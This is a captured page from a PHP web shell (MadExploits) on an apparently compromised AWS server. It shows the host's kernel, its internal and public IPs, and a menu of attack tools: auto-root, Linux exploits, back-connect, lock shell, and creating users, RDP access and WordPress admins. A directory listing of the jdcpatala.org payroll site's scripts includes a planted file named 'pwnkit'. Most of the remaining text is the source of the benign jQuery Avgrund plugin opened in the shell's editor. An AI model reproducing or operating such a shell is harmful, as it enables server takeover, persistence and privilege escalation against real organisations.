Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.217.96.88
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
payroll /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap-alert.js
2.34
KB
-rw-r--r--
bootstrap-button.js
2.65
KB
-rw-r--r--
bootstrap-carousel.js
4.9
KB
-rw-r--r--
bootstrap-collapse.js
4.29
KB
-rw-r--r--
bootstrap-dropdown.js
2.66
KB
-rw-r--r--
bootstrap-modal.js
5.54
KB
-rw-r--r--
bootstrap-popover.js
2.81
KB
-rw-r--r--
bootstrap-scrollspy.js
4.27
KB
-rw-r--r--
bootstrap-tab.js
3.3
KB
-rw-r--r--
bootstrap-toggle.js
2.76
KB
-rw-r--r--
bootstrap-tooltip.js
7.49
KB
-rw-r--r--
bootstrap-tour.js
6.67
KB
-rw-r--r--
bootstrap-transition.js
1.76
KB
-rw-r--r--
bootstrap-typeahead.js
6.91
KB
-rw-r--r--
charisma.js
18.68
KB
-rw-r--r--
excanvas.js
40.8
KB
-rw-r--r--
fullcalendar.min.js
48.83
KB
-rw-r--r--
jquery-1.11.0.min.js
94.12
KB
-rw-r--r--
jquery-1.7.2.min.js
92.62
KB
-rw-r--r--
jquery-ui-1.8.21.custom.min.js
202.07
KB
-rw-r--r--
jquery.autogrow-textarea.js
2.09
KB
-rw-r--r--
jquery.avgrund.js
3.24
KB
-rw-r--r--
jquery.chosen.min.js
22.4
KB
-rw-r--r--
jquery.cleditor.min.js
11.76
KB
-rw-r--r--
jquery.colorbox.min.js
9.46
KB
-rw-r--r--
jquery.cookie.js
1.9
KB
-rw-r--r--
jquery.dataTables.min.js
69.08
KB
-rw-r--r--
jquery.elfinder.min.js
130.93
KB
-rw-r--r--
jquery.flot.min.js
36.67
KB
-rw-r--r--
jquery.flot.pie.min.js
8.65
KB
-rw-r--r--
jquery.flot.resize.min.js
1.21
KB
-rw-r--r--
jquery.flot.stack.js
6.8
KB
-rw-r--r--
jquery.history.js
21.07
KB
-rw-r--r--
jquery.iphone.toggle.js
9.69
KB
-rw-r--r--
jquery.js
242.01
KB
-rw-r--r--
jquery.leanModal.min.js
1
KB
-rw-r--r--
jquery.min.js
91.25
KB
-rw-r--r--
jquery.noty.js
8.19
KB
-rw-r--r--
jquery.raty.min.js
7.37
KB
-rw-r--r--
jquery.uniform.min.js
9.1
KB
-rw-r--r--
jquery.uploadify-3.1.min.js
45.18
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.avgrund.js
/** * jQuery Avgrund Popin Plugin * http://github.com/voronianski/jquery.avgrund.js/ * * (c) 2012-2013 http://pixelhunter.me/ * MIT licensed */ (function (factory) { if (typeof define === 'function' && define.amd) { // AMD define(['jquery'], factory); } else if (typeof exports === 'object') { // CommonJS module.exports = factory; } else { // Browser globals factory(jQuery); } }(function ($) { $.fn.avgrund = function (options) { var defaults = { width: 380, // max = 640 height: 280, // max = 350 showClose: false, showCloseText: '', closeByEscape: true, closeByDocument: true, holderClass: '', overlayClass: '', enableStackAnimation: false, onBlurContainer: '', openOnEvent: true, setEvent: 'click', onLoad: false, onUnload: false, template: '<p>This is test popin content!</p>' }; options = $.extend(defaults, options); return this.each(function() { var self = $(this), body = $('body'), maxWidth = options.width > 640 ? 640 : options.width, maxHeight = options.height > 350 ? 350 : options.height, template = typeof options.template === 'function' ? options.template(self) : options.template; body.addClass('avgrund-ready'); if ($('.avgrund-overlay').length === 0) { body.append('<div class="avgrund-overlay ' + options.overlayClass + '"></div>'); } if (options.onBlurContainer !== '') { $(options.onBlurContainer).addClass('avgrund-blur'); } function onDocumentKeyup (e) { if (options.closeByEscape) { if (e.keyCode === 27) { deactivate(); } } } function onDocumentClick (e) { if (options.closeByDocument) { if ($(e.target).is('.avgrund-overlay, .avgrund-close')) { e.preventDefault(); deactivate(); } } else if ($(e.target).is('.avgrund-close')) { e.preventDefault(); deactivate(); } } function activate () { if (typeof options.onLoad === 'function') { options.onLoad(self); } setTimeout(function() { body.addClass('avgrund-active'); }, 100); var $popin = $('<div class="avgrund-popin ' + options.holderClass + '"></div>'); $popin.append(template); body.append($popin); $('.avgrund-popin').css({ 'width': maxWidth + 'px', 'height': maxHeight + 'px', 'margin-left': '-' + (maxWidth / 2 + 10) + 'px', 'margin-top': '-' + (maxHeight / 2 + 10) + 'px' }); if (options.showClose) { $('.avgrund-popin').append('<a href="#" class="avgrund-close">' + options.showCloseText + '</a>'); } if (options.enableStackAnimation) { $('.avgrund-popin').addClass('stack'); } body.bind('keyup', onDocumentKeyup) .bind('click', onDocumentClick); } function deactivate () { body.unbind('keyup', onDocumentKeyup) .unbind('click', onDocumentClick) .removeClass('avgrund-active'); setTimeout(function() { $('.avgrund-popin').remove(); }, 500); if (typeof options.onUnload === 'function') { options.onUnload(self); } } if (options.openOnEvent) { self.bind(options.setEvent, function (e) { e.stopPropagation(); if ($(e.target).is('a')) { e.preventDefault(); } activate(); }); } else { activate(); } }); }; }));
Close